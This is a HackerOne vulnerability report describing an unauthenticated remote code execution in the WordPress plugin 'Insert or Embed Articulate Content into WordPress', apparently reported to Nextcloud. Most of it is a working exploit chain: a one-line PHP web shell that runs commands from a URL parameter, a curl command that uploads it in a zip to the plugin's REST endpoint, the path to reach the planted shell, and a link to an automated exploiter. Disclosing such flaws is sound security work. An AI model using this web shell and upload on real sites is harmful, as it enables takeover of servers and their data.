Nextcloud: WordPress Plugin Insert or Embed Articulate Content into WordPress Remote Code Execution (UNAUTHORIZED)

2019-09-17T03:52:56
ID H1:696198
Type hackerone
Reporter j4tayu
Modified 2019-11-11T15:23:26

Description

because in the burp suite, the build request is complicated, I only use curl 1. Create file index.html and index.php

Index.html : <html> Hello world </html>

Index.php : <?php system($_GET[cmd]); ?>

  1. Once created enter into .zip (COMPRESS)
  2. LETS UPLOAD CURL : curl site.com/index.php/wp-json/articulate/v1/upload-data -F "name={NAMAFILE}" -F "chunk={RANDOM}" -F "chunks={RANDOM}" -F "file=@YOURFILE.zip"
  3. OK HERE, THERE IS A READING UPLOAD COMPLETE which means success we try access to site.com/PATH/ <PATH = PATH AT RESULT EX: site.com/wp-content/uploads/articulate_uploads/kntl17/index.php

For the autoxploiter https://pastebin.com/BEy5iDLA

Impact

Remote code execution